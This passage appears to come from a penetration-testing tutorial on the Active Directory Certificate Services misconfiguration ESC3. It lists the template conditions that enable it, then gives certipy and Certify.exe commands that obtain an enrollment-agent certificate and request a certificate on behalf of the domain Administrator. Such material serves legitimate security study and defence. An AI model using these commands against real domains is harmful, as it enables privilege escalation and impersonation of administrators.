ESC3

Unlike ESC1 and ESC2, this method requires two certificate templates with the following requirements

• First Template

  • Certificate Request Agent EKU

  • Manager approval turned off

• Second Template

  • Client Authentication EKU

  • Application Policy Issuance Requirement with Authorized Signatures Required enabled and set to 1

  • Manager approval turned off

And, of course, a user with enrollment rights.

In the context of ADCS, the Application Policy defines additional constraints that must me met for a certificate to be issued successfully from a template; having the Authorized Signatures Required attribute set to 1 (or TRUE) means that the certificate issuance process must include authorized signatures to enforce proper authorization and control over the issued certificate.

To abuse ESC3 we request the vulnerable certificate template, this subsequently allows us to request any other template on behalf of any other user; we will use the on-behalf-of flag and a template that can be used for Client Authentication like the built-in User template.

certipy req -u otter -p 'SomethingSecure123!' -ca otter-CA -template ESC3 -upn Administrator

certipy req -u otter -p 'SomethingSecure123!' -ca otter-CA -template User -on-behalf-of 'domain\administrator' -pfx otter.pfx

As always, the same attack can be performed with Certify

.\Certify.exe request /ca:dc.domain.com\otter-CA /template:ESC3

.\Certify.exe request /ca:dc.domain.com\otter-CA /template:User /onbehalfof:DOMAIN\Administrator /enrollcert:cert.pfx